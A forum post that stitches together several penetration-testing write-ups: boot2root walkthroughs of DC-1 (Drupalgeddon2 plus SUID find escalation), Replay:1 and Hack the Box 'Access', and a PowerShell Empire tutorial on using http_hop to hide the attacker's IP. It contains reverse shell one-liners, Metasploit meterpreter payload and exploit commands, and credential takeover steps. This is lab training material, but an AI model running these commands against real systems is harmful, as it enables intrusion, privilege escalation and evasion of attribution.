Login

**NINZA** · 05-14-2020, 11:52 AM

0			0

Hello friends! Today we are going to take another boot2root challenge known as “DC-1: 1”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM

[To see content please register here]

.
Security Level: Beginner
Penetrating Methodology:

IP Discovery using netdiscover
Network scanning (Nmap)
Surfing HTTPS service port (80)
Finding Drupal CMS
Exploiting Drupalgeddon2 to get a reverse shell
Finding files with SUID bit set
Finding the “find” command with SUID bit set
Getting root shell with “find” command
Getting final flag

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover
1
netdiscover
[Image: 0.png?w=687&ssl=1]

We found our target –> 192.168.1.104
Our next step is to scan our target with nmap.
nmap -sV 192.168.1.104
1
nmap -sV 192.168.1.104
[Image: 1.png?w=687&ssl=1]

The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 111(RPC)
We find that port 80 is running http, so we open the IP in our browser.
[Image: 2.png?w=687&ssl=1]

When we access the web service we find that the server is running Drupal CMS. As the target system is running Drupal CMS, we can check if it is vulnerable to Drupalgeddon2 exploit. We run the exploit using Metasploit on the target machine and successfully able to get a reverse shell.
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.104
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run
1
2
3
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.104
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run
After getting a reverse shell we spawn a TTY shell using python. Then we find a file with suid permission on the server and find that the “find” command has SUID bit set.
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null
1
2
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null
[Image: 3.png?w=687&ssl=1]

As “find” command has SUID bit set, we can execute the command as “root” user. We create a file called “raj” and use “find” command to check if is executing the commands as root user, the reason for creating a file is so that we can use with “find” command. As running it with a single file will run the command only once.
After executing the command “whoami”, we find that we can run commands as root user. We now execute “/bin/bash” using “find” command and are successfully able to spawn a shell as root user. We now go to /root directory and find a file called “thefinalflag.txt”. We take a look at the content of the file and find a congratulatory message for completing the VM.
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;
1
2
3
touch raj
find raj -exec "whoami" \;
find raj -exec "/bin/sh" \;
[Image: 4.png?w=687&ssl=1]

This is our fourth article in empire series, in this article we learn to use hop payload in PowerShell empire. Empire has an inbuilt listener named http_hop which allows us to redirect our traffic to one of our another active listener after getting an agent. Thus, the name hop as it hops the agent from one listener to another in order to redirect traffic.
Similar to Metasploit, the hop listener in empire uses a hop.php file. When you activate the hop listener, it will generate three PHP files that will redirect your existing listener. Place the said files in your jump server (ubuntu) and then set up your stager in according to get the session through the mediator i.e. our hop listener.
In the following image, you can see our Kali’s IP. Now, we will try and take windows session via ubuntu using http_hop payload, in order to hide our own IP, i.e. basically, our http_hop payload will help us (attacker) to hide from the getting caught.
[Image: 1.png?w=687]

Here, in the following image, you can see our ubuntu’s IP too.
[Image: 2.png?w=687]

Now, let’s get started. First, we should have a simple http listener, for that type :
uselistener http
execute
1
2
uselistener http
execute
[Image: 3.png?w=687]

Now, start the http_hop listener by typing :
uselistener http_hop
set RedirectListener http
set Host //192.168.1.111
1
2
3
uselistener http_hop
set RedirectListener http
set Host //192.168.1.111
Here, we have given RedirectListener i.e. all the traffic from http listener will be directed to the http_hop listener.
[Image: 4.png?w=687]

Executing the above listener will create three files as you can see that in the image above. Transfer these files to /var/www/html location of your Ubuntu as shown in the image below :
[Image: 6.png?w=687]

Now, you can see in the image below we have activated two listeners :
[Image: 7.1.png?w=687]

Let’s start our stager by typing the following commands :
usestager windows/launcher_bat
set Listener http_hop
execute
1
2
3
usestager windows/launcher_bat
set Listener http_hop
execute
[Image: 7.png?w=687]

Once our bat file is executed in the target PC, we will have our session. Now, if you observe the IP through which we have obtained the session is of Ubuntu and not of windows but we have the access of a Windows PC, similarly, in windows, it will show that the attacking machine is Ubuntu and not kali. Hence our http_hop is effective.
[Image: 8.png?w=687]

In conclusion, the major advantage of the http_hop listener is that it helps an attacker from being identified as on the target PC, as the said listener hides the original IP.

Hello friends! Today we are going to take another boot2root challenge known as “Replay: 1”. The credit for making this VM machine goes to “c0rruptedb1t” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM

[To see content please register here]

.
Security Level: Intermediate
Flags: There is one flag (flag.txt).
Penetrating Methodology:

IP Discovery using netdiscover
Network scanning (Nmap)
Surfing HTTPS service port (80)
Enumerating password from Source code.
Enumerating robots.txt and finding the zip file
Unzipping zip file
Enumerating password from the binary file
Enumerating the hardcoded command
Editing the hardcoded command
Getting a reverse shell
Enumerating password for the user
Elevate Privileges to get root
Getting Flag

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover
1
netdiscover
[Image: 0.png?w=687&ssl=1]

We found our target –> 192.168.1.37
Our next step is to scan our target with nmap.
nmap -p- -A 192.168.1.37
1
nmap -p- -A 192.168.1.37
[Image: 1.png?w=687&ssl=1]

The NMAP output shows us that there are 3 ports open: 22(SSH), 80(HTTP), 1337(Unknown)
[Image: 2.png?w=687&ssl=1]

We find that port 80 is running http, so we open the IP in our browser.
We take a look at the source code of web page and at the top of the source code, we find a string inside a comment. We are not able to do anything with it, so we save it for later.
[Image: 3.png?w=687&ssl=1]

Nmap scan shows us that there is one entry inside robots.txt. We open robots.txt and find an entry called “/bob_db.zip”.
[Image: 4.png?w=687&ssl=1]

We open the link and download the zip file from the web server. After downloading the file, we extract it and find 64-bit ELF file and a text file. We take a look at the content of the text file and don’t find anything of use.
[Image: 5.png?w=687&ssl=1]

When we run the application “client.bin”, it asks for an IP address and a password.
[Image: 6.png?w=687&ssl=1]

As we have no clue for the password, we check the strings inside the application and there we find a hint for the password. Inside the application, we find the second half of the password. Now earlier inside the web page, we found a strange string that might be the first half of the password.
Password: qGQjwO4h6gh0TAIRNXuQcDu9Lqsyul
[Image: 7.png?w=687&ssl=1]

We joined the string and use it as a password for the application. After giving the password, we successfully able to login, and find that we can run commands. But when we type a command we get an error stating that we are sending unauthorized packets and the connection gets closed.
[Image: 8.png?w=687&ssl=1]

Now when we take a closer look at the application we find that the command “;whoami” is hardcoded in the application.
[Image: 9.png?w=687&ssl=1]

We try to edit the application and change “;whoami” command to something else and find that the size of string inside the application should remain the same and the command should always start with a semi-colon. So we changed the “;whoami” to “;uname -a” keeping the number of characters inside the application the same by replacing existing characters inside the application.
[Image: 10.png?w=687&ssl=1]

Now when we run the application and give the password we are successfully able to execute our command.
[Image: 11.png?w=687&ssl=1]

Now we replace the entire string with our netcat reverse shell one-liner and used extra characters to keep the size of the application the same.
nc -e /bin/bash 192.168.1.25 4444;ls;ls;ls;ls;ls;ls;ls;
1
nc -e /bin/bash 192.168.1.25 4444;ls;ls;ls;ls;ls;ls;ls;
[Image: 14.png?w=687&ssl=1]

Now we run the application and give the correct the password.
[Image: 15.png?w=687&ssl=1]

We setup our listener and are successfully able to get a reverse shell. After getting a reverse shell we spawn a TTY shell using python.
nc -lvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'
1
2
nc -lvp 4444
python -c 'import pty;pty.spawn("/bin/bash")'
[Image: 16.png?w=687&ssl=1]

Enumerating through the directories inside “~/Documents/.ftp” we find a file called “users.passwd”. We open it and find the password for user “bob”. Now we check the sudoers list and find that we can run all commands as root user.
sudo -l
1
sudo -l
[Image: 17.png?w=687&ssl=1]

As we have the password for user bob, we spawn a shell as the root user. We go to “/” directory and find a file called “flag.txt”. We take a look at the content of the file and find the congratulatory flag.
sudo -i
cd /
cat flag.txt
1
2
3
sudo -i
cd /
cat flag.txt
[Image: 18.png?w=687&ssl=1]

Today we are going to solve another CTF challenge “Access”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Access is 10.10.10.98.
Penetrating Methodologies:

Network scanning (nmap).
Logging in FTP using Anonymous Login.
Using strings to read contents of the .mdb file.
Unzipping Zip file using 7z.
Using readpst to read the contents of the .pst file.
Finding Login Credentials
Logging into Telnet.
Finding the first flag user.txt
Using web delivery module to create PowerShell code.
Getting Meterpreter.
Using exploit suggester of Metasploit.
Getting Root Access.
Changing the Administrator password using net user.
Reading Our Final flag root.txt

Walkthrough
Let’s start off with scanning the network to find our target.
nmap -p- -A 10.10.10.98
1
nmap -p- -A 10.10.10.98
[Image: 1.png?w=687&ssl=1]

The first thing that got our attention is that we have anonymous access to the ftp server. Let’s login and see what we find.
After successfully logging into FTP server, we have enumerated directories from where we have downloaded two files Access Control.zip and backup.mdb. They might come in handy later on.
ftp 10.10.10.98
1
ftp 10.10.10.98
When we tried to unzip the zip file found out that it was password protected. So we tried to open the backup.mdb file and found a password to the zip file.
strings backup.mdb | grep access
1
strings backup.mdb | grep access
[Image: 4.png?w=687&ssl=1]

Once we have obtained the password for the Access Control.zip. Time to unzip it. After unzipping we saw its a .pst which is a Microsoft Exchange Format for mailboxes. Using readpst it converted the file into the .mbox format.
7z x Access\ Control.zip
readpst 'Access Control.pst'
1
2
7z x Access\ Control.zip
readpst 'Access Control.pst'
Let’s read the contents of the Access Control.mbox.
less 'Access Control.mbox'
1
less 'Access Control.mbox'
[Image: 5.png?w=687&ssl=1]

After reading the contents, we saw that user credentials that surely going to help us to move ahead.
Username- security
Password- 4Cc3ssC0ntr0ller
1
2
Username- security
Password- 4Cc3ssC0ntr0ller
[Image: 7.png?w=687&ssl=1]

Let’s login into telnet using our new credentials. After enumerating through directories, we have found our first flag.
telnet 10.10.10.98
dir
cd Desktop
type user.txt
1
2
3
4
telnet 10.10.10.98
dir
cd Desktop
type user.txt
[Image: 8.png?w=687&ssl=1]

Let’s create a shellcode generated via the web delivery module of Metasploit.
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.6
exploit
1
2
3
4
5
use exploit/multi/script/web_delivery
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.6
exploit
[Image: 9.png?w=687&ssl=1]

Now we will execute the PowerShell code generated via the web delivery module.
[Image: 10.png?w=687&ssl=1]

We have successfully got the meterpreter. Moving forward.
getuid
getsystem
sysinfo
1
2
3
getuid
getsystem
sysinfo
[Image: 11.1.png?w=687&ssl=1]

After that, we have used exploit suggester which has given us all the possible exploits for the operating system of the Victims system.
use post/multi/recon/local_exploit_suggester
set session 1
exploit
1
2
3
use post/multi/recon/local_exploit_suggester
set session 1
exploit
[Image: 11.png?w=687&ssl=1]

Using the exploit ms16_014_wmirecv_notif of Metasploit.
use exploit/windows/local/ms16_014_wmi_recv_notif
set lhost 10.10.14.6
set session 1
set lport 1234
exploit
1
2
3
4
5
use exploit/windows/local/ms16_014_wmi_recv_notif
set lhost 10.10.14.6
set session 1
set lport 1234
exploit
oh yeah! We have got the root access.
whoami
1
whoami
[Image: 12.png?w=687&ssl=1]

Now we changed the password for Administrator because we can use it to login via telnet.
net user
net user Administrator Ignite@123
1
2
net user
net user Administrator Ignite@123
[Image: 13.png?w=687&ssl=1]

Here we successfully logged in via Telnet and found our final flag.
telnet 10.10.10.98
login: administrator
password: Ignite@123
cd Desktop
type root.txt
1
2
3
4
5
telnet 10.10.10.98
login: administrator
password: Ignite@123
cd Desktop
type root.txt
[Image: 14.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis